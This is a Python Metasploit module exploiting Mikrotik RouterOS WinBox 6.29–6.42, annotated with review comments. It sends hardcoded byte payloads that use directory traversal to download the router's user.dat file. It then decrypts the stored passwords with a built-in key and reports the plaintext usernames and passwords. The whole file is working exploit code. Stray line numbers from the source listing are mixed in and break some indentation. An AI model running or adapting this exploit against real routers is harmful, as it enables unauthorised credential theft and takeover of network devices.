#!/usr/bin/python3
# Exploit Title: Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)
# Date: 2018-05-21
# Exploit Author(s): Omid Shojaei (@Dmitriy_area51), Dark VoidSeeker, Alireza Mosajjal
# Vendor Page: https://www.mikrotik.com/
# Software Link: https://mikrotik.com/download
# Version: 6.29 - 6.42
# Tested on: Metasploit Framework: 4.16.58-dev on Kali Linux
# CVE: N/A
  10.  
  11.  
  12. import sys
  13. import socket
  14. import hashlib
  15. import logging
  16.  
  17. from metasploit import module
  18.  
# First request sent to the WinBox port (run() calls it the "hello").
# The sequence 0x01 0x00 0x00 0x21 followed by a length byte introduces a
# length-prefixed string field -- the same encoding that
# extract_user_pass_from_entry() parses in the reply.  Here the length is
# 0x35 (53) and the string decodes to
#   /////./..//////./..//////./../flash/rw/store/user.dat
# i.e. a directory traversal to the RouterOS user database.  The other bytes
# are protocol framing reproduced verbatim from the original exploit.
FIRST_PAYLOAD = \
    [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
     0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
     0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
     0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,   # "/////./"
     0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,   # "..//////"
     0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,   # "./..////"
     0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,   # "//./../f"
     0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,   # "lash/rw/"
     0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,   # "store/us"
     0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,   # "er.dat" + framing
     0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
     0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
     0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
     0x00, 0x00]
  34.  
  35.  
# Second request, sent after the hello reply.  Byte 19 (0x35 in this
# template) is a placeholder: run() overwrites it with the session id it
# takes from byte 38 of the device's reply to FIRST_PAYLOAD, then sends the
# result.  The device answers with the requested file content, which run()
# hands to dump() starting at offset 55 of that reply.
SECOND_PAYLOAD = \
    [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
     0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
     0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,   # index 19 = session id slot
     0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
     0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
     0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
     0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
     0x00, 0x02, 0x00, 0x00, 0x00]
  45.  
  46.  
# Module metadata handed to module.run() in the __main__ guard below.
METADATA = {
    "name": "Mikrotik RouterOS WinBox Credentials Leakage",
    "description": '''
This module extracts winbox credentials in
winbox releases prior to 04/20/2018
''',
    "authors": [
        "Omid Shojaei (@Dmitriy_area51)",
        "Dark VoidSeeker",
        "Alireza Mosajjal" # Original author
    ],
    "date": "2018-05-21",
    "license": "MSF_LICENSE",
    "references": [
        {"type": "url", "ref": "https://github.com/BigNerd95/WinboxExploit"}
    ],
    # NOTE(review): run() reads args['rhost'] for its log prefix although only
    # RHOSTS/RPORT are declared here; presumably the framework injects 'rhost'
    # per target for single_scanner modules -- confirm against the framework
    # version in use.
    "type": "single_scanner",
    "options": {
        "RHOSTS": {
            "type": "address",
            "description": "The Mikrotik device to extract credentials (Just 1 IP)",
            "required": True,
            "default": None
        },
        # Declared as "string" but defaulted to an int; run() wraps the value
        # in int(), so either form works.
        "RPORT": {
            "type": "string",
            "description": "The Mikrotik device's winbox port number.",
            "required": True,
            "default": 8291
        }
    }}
  78.  
  79. def decrypt_password(user, pass_enc):
  80. key = hashlib.md5(user + b"283i4jfkai3389").digest()
  81.  
  82. passw = ""
  83. for i in range(0, len(pass_enc)):
  84. passw += chr(pass_enc[i] ^ key[i % len(key)])
  85.  
  86. return passw.split("\x00")[0]
  87.  
def _length_prefixed_field(entry, marker):
    """Return the length-prefixed field that follows ``marker`` in ``entry``.

    The byte right after ``marker`` is the field length, the field itself
    follows.  Raises ``IndexError`` when ``marker`` is absent (``split``
    yields a single piece) or when nothing follows it.
    """
    after_marker = entry.split(marker)[1]
    field_length = after_marker[0]
    return after_marker[1:1 + field_length]


def extract_user_pass_from_entry(entry):
    """Pull the raw username and obfuscated password out of one user record.

    ``entry`` is the bytes of a single record (the part after an ``M2``
    marker).  The username sits behind ``\\x01\\x00\\x00\\x21`` and the
    password behind ``\\x11\\x00\\x00\\x21``, each as a one-byte length plus
    payload.  Returns ``(username_bytes, password_bytes)``; raises
    ``IndexError`` if either marker is missing.
    """
    username = _length_prefixed_field(entry, b"\x01\x00\x00\x21")
    password = _length_prefixed_field(entry, b"\x11\x00\x00\x21")
    return username, password
  99.  
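def get_pair(data):
    """Parse every user record in a raw ``user.dat`` dump into credential pairs.

    ``data`` is the file content as returned by the device (bytes or
    bytearray).  Records are located by the ``M2`` marker; a record that
    lacks the expected username/password fields is skipped rather than
    aborting the whole dump.

    Returns a list of ``(username, password)`` ``str`` tuples in file order.
    """
    user_list = []

    for entry in data.split(b"M2")[1:]:
        try:
            user, pass_encrypted = extract_user_pass_from_entry(entry)
        except IndexError:
            # Marker or length byte missing: not a complete record.  This is
            # the only exception the extractor raises on bytes input; the
            # former bare ``except`` also swallowed KeyboardInterrupt and
            # genuine bugs.
            continue

        pass_plain = decrypt_password(user, pass_encrypted)
        # A non-ASCII byte in the name field used to raise UnicodeDecodeError
        # here and abort the entire dump; keep the record and mark the
        # undecodable bytes instead.
        user = user.decode("ascii", errors="replace")

        user_list.append((user, pass_plain))

    return user_list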
  117.  
def dump(data, rhost):
    """Log and report every credential pair recovered from ``data``.

    ``data`` is the raw user.dat content and ``rhost`` the target the
    credentials are attributed to when handed to
    ``module.report_correct_password``.  Note that the plaintext password is
    also written to the module log.
    """
    for username, password in get_pair(data):
        logging.info("%s:%s" % (username, password))
        module.report_correct_password(username, password, host=rhost)
  123.  
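# Offsets taken from the original exchange: the session id is byte 38 of the
# device's reply to FIRST_PAYLOAD and is written over byte 19 of
# SECOND_PAYLOAD; the returned file content starts 55 bytes into the second
# reply.
_SESSION_ID_REPLY_OFFSET = 38
_SESSION_ID_REQUEST_OFFSET = 19
_FILE_CONTENT_OFFSET = 55
_RECV_SIZE = 1024
_TIMEOUT_SECONDS = 3


def _patch_session_id(template, hello_reply):
    """Return a copy of ``template`` carrying the session id found in ``hello_reply``.

    ``template`` is the SECOND_PAYLOAD byte sequence, ``hello_reply`` the
    bytes the device answered FIRST_PAYLOAD with.

    Raises ``ValueError`` when ``hello_reply`` is too short to hold the id --
    what an empty or unexpected reply (listener is not WinBox, or does not
    speak this exchange) looks like.  The original code indexed the reply
    unconditionally and died with IndexError in that case.
    """
    if len(hello_reply) <= _SESSION_ID_REPLY_OFFSET:
        raise ValueError(
            "reply too short to contain a session id ({} bytes)".format(len(hello_reply))
        )
    request = bytearray(template)
    request[_SESSION_ID_REQUEST_OFFSET] = hello_reply[_SESSION_ID_REPLY_OFFSET]
    return request


def run(args):
    """Module entry point: fetch user.dat from one WinBox listener and report credentials.

    ``args`` is the option dict the framework passes in; ``RHOSTS``/``RPORT``
    are the options declared in METADATA and ``rhost`` is the key used for
    the log prefix (presumably injected per target by the framework for
    ``single_scanner`` modules -- verify against the framework version in use).

    Side effects: one TCP connection to the target, log output, and
    ``module.report_host`` / ``report_correct_password`` calls via ``dump``.
    Any socket error (refused, reset, unreachable, name lookup, timeout) is
    logged and ends the run; previously only a connect timeout was caught and
    every other failure propagated as an uncaught exception, and the socket
    was never closed.
    """
    module.LogHandler.setup(msg_prefix="[{}] - ".format(args['rhost']))

    target = str(args['RHOSTS'])
    port = int(args['RPORT'])

    try:
        # create_connection resolves the name, handles IPv6 and applies the
        # timeout to every later send/recv; ``with`` closes the socket on
        # every exit path.
        with socket.create_connection((target, port), timeout=_TIMEOUT_SECONDS) as sock:
            # Hello: the reply carries the session id the next request must echo.
            sock.sendall(bytearray(FIRST_PAYLOAD))
            hello_reply = bytearray(sock.recv(_RECV_SIZE))

            try:
                request = _patch_session_id(SECOND_PAYLOAD, hello_reply)
            except ValueError as exc:
                logging.error("Unexpected hello reply (not a WinBox service, or not vulnerable): %s", exc)
                return

            # File request with the session id filled in; the reply holds user.dat.
            sock.sendall(request)
            # NOTE(review): a single recv may truncate user.dat on devices with
            # many accounts -- confirm the reply framing before adding a read loop.
            reply = bytearray(sock.recv(_RECV_SIZE))
    except OSError as exc:
        # socket.timeout, ConnectionRefusedError, gaierror ... are all OSError.
        logging.error("Connection to %s:%d failed: %s", target, port, exc)
        return

    module.report_host(target)
    dump(reply[_FILE_CONTENT_OFFSET:], target)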
  154.  
if __name__ == "__main__":
    # Hand the metadata and the run() callback to the framework shim, which
    # drives the module from here.
    module.run(METADATA, run)